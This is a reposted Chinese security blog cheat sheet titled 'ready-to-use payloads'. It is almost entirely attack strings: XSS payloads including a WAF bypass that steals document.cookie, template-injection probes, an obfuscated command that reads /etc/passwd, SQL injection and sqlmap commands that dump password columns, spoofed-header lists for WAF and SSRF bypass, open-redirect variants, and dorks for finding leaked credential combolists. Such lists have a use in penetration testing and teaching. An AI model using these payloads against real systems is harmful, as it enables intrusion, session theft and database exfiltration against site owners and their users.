【收藏】开箱即用的Payloads

admin
admin
admin
102394
文章
87
评论
2024年2月21日23:40:58评论8 views字数 7267阅读24分13秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

博客新域名:https://gugesay.com

【收藏】开箱即用的Payloads

Payloads 字典:

https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/cujanovic/Markdown-XSS-Payloads
https://github.com/pwntester/ysoserial.net
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks (APIs)
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3 
(AWS Buckets)
http://www.xss-payloads.com

Payloads ‘奥义’

利用UTF-8的Bypass

< = %C0%BC = %E0%80%BC = %F0%80%80%BC> = %C0%BE = %E0%80%BE = %F0%80%80%BE' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2" = %CA%BA' = %CA%B9Null = %00

XSS‘创意’

#基本要点与首选<script>alert(1)</script><script>alert(1)//<script src="http://xss.rocks/xss.js"></script><img src/onerror=alert(1)> <a href="javascript:alert(1)"></a>#XSS策略:jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3ehttps://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot#Akamai WAF 绕过:<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>#注入XSS或注入其他html标签形成新的登录页面: https://saajanbhujel.medium.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37# XSS 执行 SSRF:<script>window.location="http://endereço.."</script>#其它:<IMG SRC=javascript:alert('XSS')>#jQuery 版本:alert(jQuery.fn.jquery);

Angular 模版注入

{{constructor.constructor('alert(1)')()}}{{constructor.constructor('alert(/XSS Stored!/)')()}}1023+1 ou {{1023+1}}

Ruby 模版注入

<%= 7*7 %>

读取 /etc/passwd

cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss????n/??t$IFS/?tc/????wd??n${PATH%%[a-z]*}??t$IFS${PATH%%[a-z]*}??c${PATH%%u*}?????d../../../../../../../../../../../../etc/passwdExplantion:$'x41' => 'A' (HEX)$'U41' => 'A'  (HEX Unicode)$'101' => 'A' (Octal)

SQL注入‘创意’

1+OR/AND+1=1 and sELeCt/*Test*/1 and so ./?id=1%27%20AND%20%271%27=LENGTH(%27;%27)%20--+/?id=1%27%20AND%20%271%27=LENGTH(%27;;%27)%20--+/?id=1%27%20AND%20%271%27=STRCMP(%22;%22,%20%22;%22);%20--+/?id=1%27%20AND%20%271%27=STRCMP(%22;;%22,%20%22;%22);%20--+/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=1)%20--+/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=12)%20--+#SQL 盲注 与 绕过:Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z#从SQL注入到RCE:https://systemweakness.com/sql-injection-to-remote-command-execution-rce-dd9a75292d1d

RCE

https://www.revshells.com/

https://www.100security.com.br/reverse-shell

https://4bdoz.medium.com/rce-by-code-injection-perl-reverse-shell-a2e90181b10

常用SQLMap 命令

https://github.com/sqlmapproject/sqlmap/wiki/Usagesqlmap.py -u [URL]?[Param]=* dbmssqlmap.py -u [URL]?[Param]=* dbms --cookie 'ASP.NET_SessionId=abc123'sqlmap.py -u [URL]?[Param]=1 dbms --level=2,3,4,5sqlmap.py -u [URL]?[Param]=1 --privilegessqlmap.py -u [URL]?[Param]=1 --tables --fresh-queriessqlmap.py -u [URL]?[Param]=1 --sql-shellsqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] --columns  --fresh-queriessqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] -C email,nome,senha --dump --fresh-queriessqlmap.py -u [URL]?[Param]=1 -D [database_name] -T [table_name] --dump --predict-output----batch:sqlmap.py -my tempsqlmap_targets.txt dbms

通过 IP 绕过WAF控制

X-Originating-IP:localhostX-Forwarded-For:localhostX-Remote-IP:localhostX-Remote-Addr:localhostX-Forwarded-Host:localhostX-Client-IP:localhostX-Remote-IP:localhostX-Remote-Addr:localhostX-Host:localhostTrue-Client-Ip:localhost

忘记密码-利用电子邮件头注入

email="[email protected]%0a%0dcc:[email protected]"

开放重定向/SSRF Payloads生成器

https://tools.intigriti.io/redirector/

#基本Payloads:https://google.com/redirect.php?redirect=https:/facebook.comhttps://google.com/redirect.php?redirect=https://facebook.comhttps://google.com/redirect.php?redirect=http://facebook.comhttps://google.com/redirect.php?redirect=https:/facebook.comhttps://google.com/redirect.php?redirect=#facebook.comhttps://google.com/redirect.php?redirect=#%[email protected]https://google.com/redirect.php?redirect=/facebook.com#URL 编码:https://google.com/redirect.php?redirect=%2Ffacebook.comhttps://google.com/redirect.php?redirect=%2F%2Ffacebook.comhttps://google.com/redirect.php?redirect=https%3A%2F%2Ffacebook.com#CRLF:https://google.com/redirect.php?redirect=%0D%0A/facebook.com#白名单域或关键字:https://google.com/redirect.php?redirect=google.com.facebook.comhttps://google.com/redirect.php?redirect=google.comfacebook.com#“https:”绕过“:https://google.com/redirect.php?redirect=https:facebook.com#"/" 绕过:https://google.com/redirect.php?redirect=//facebook.com/https://google.com/redirect.php?redirect=//facebook.com/#参数污染:https://google.com/redirect.php?redirect=?next=google.com&next=facebook.com#@ 绕过:https://google.com/[email protected]#// 绕过:https://google.com/redirect.php?redirect=//facebook.comhttps://google.com/redirect.php?redirect=https://google.com/redirect.php?redirect=#自右向左大法:https://google.com/redirect.php?redirect=%40%E2%80%[email protected]#空字节%00绕过黑名单过滤器:https://google.com/redirect.php?redirect=facebook%00.com#'%E3%80%82' or '。'绕过:https://google.com/redirect.php?redirect=facebook%E3%80%82comhttps://google.com/redirect.php?redirect=facebook。com

SSRF 绕过列表

PS:复制以下所有标头并粘贴到请求中

Base-Url: 127.0.0.1Client-IP: 127.0.0.1Http-Url: 127.0.0.1Proxy-Host: 127.0.0.1Proxy-Url: 127.0.0.1Real-Ip: 127.0.0.1Redirect: 127.0.0.1Referer: 127.0.0.1Referrer: 127.0.0.1Refferer: 127.0.0.1Request-Uri: 127.0.0.1Uri: 127.0.0.1Url: 127.0.0.1X-Client-IP: 127.0.0.1X-Custom-IP-Authorization: 127.0.0.1X-Forward-For: 127.0.0.1X-Forwarded-By: 127.0.0.1X-Forwarded-For-Original: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded-Host: 127.0.0.1X-Forwarded-Port: 443X-Forwarded-Port: 4443X-Forwarded-Port: 80X-Forwarded-Port: 8080X-Forwarded-Port: 8443X-Forwarded-Scheme: httpX-Forwarded-Scheme: httpsX-Forwarded-Server: 127.0.0.1X-Forwarded: 127.0.0.1X-Forwarder-For: 127.0.0.1X-Host: 127.0.0.1X-Http-Destinationurl: 127.0.0.1X-Http-Host-Override: 127.0.0.1X-Original-Remote-Addr: 127.0.0.1X-Original-Url: 127.0.0.1X-Originating-IP: 127.0.0.1X-Proxy-Url: 127.0.0.1X-Real-Ip: 127.0.0.1X-Remote-Addr: 127.0.0.1X-Remote-IP: 127.0.0.1X-Rewrite-Url: 127.0.0.1X-True-IP: 127.0.0.1

不安全的反序列化

#基本Payloads: https://github.com/pwntester/ysoserial.net#Json 不安全反序列化: https://medium.com/r3d-buck3t/insecure-deserialization-with-json-net-c70139af011a#Json payloads:https://github.com/pwntester/ysoserial.nethttps://medium.com/c-sharp-progarmming/stop-insecure-deserialization-with-c-6a488c95cf2f

利用 JWT 标头注入绕过 WT 身份验证

PHP 备忘

https://hackcommander.github.io/pentesting-article-1/#

#探索 php 开关:https://domdom.tistory.com/entry/HackTheBoo-Web-Juggling-Facts-Writeup%EB%AC%B8%EC%A0%9C%ED%92%80%EC%9D%B4?category=1004766  "body": "{"type":true}"  fetch("http://198.211.107.250:1337/api/getfacts", {    "headers": {      "content-type": "application/json"    },    "body": "{"type":1}",    "method": "POST",    "mode": "cors",  }).then((r)=>r.text()).      then((r)=>console.log(r));

Dorks 相关

https://www.exploit-db.com/google-hacking-database/https://www.googleguide.com/advanced_operators_reference.html#直接通过托管站点查找泄漏:intitle:( combolist | dehashed | stealer ) site:anonfiles.com#除了流行的 AnonFiles,也可以在以下平台上发现'有趣'的东西:> bayfiles.com> dataism-x.com> pastebin.com> justpaste.it> file.io> filechan.org> mega.com> drive.google.comintext:"usuario" | "senha" | "username" | "password" | "mysql"

感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~

====正文结束====

原文始发于微信公众号(骨哥说事):【收藏】开箱即用的Payloads

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日23:40:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【收藏】开箱即用的Payloadshttp://cn-sec.com/archives/2507865.html

发表评论

匿名网友 填写信息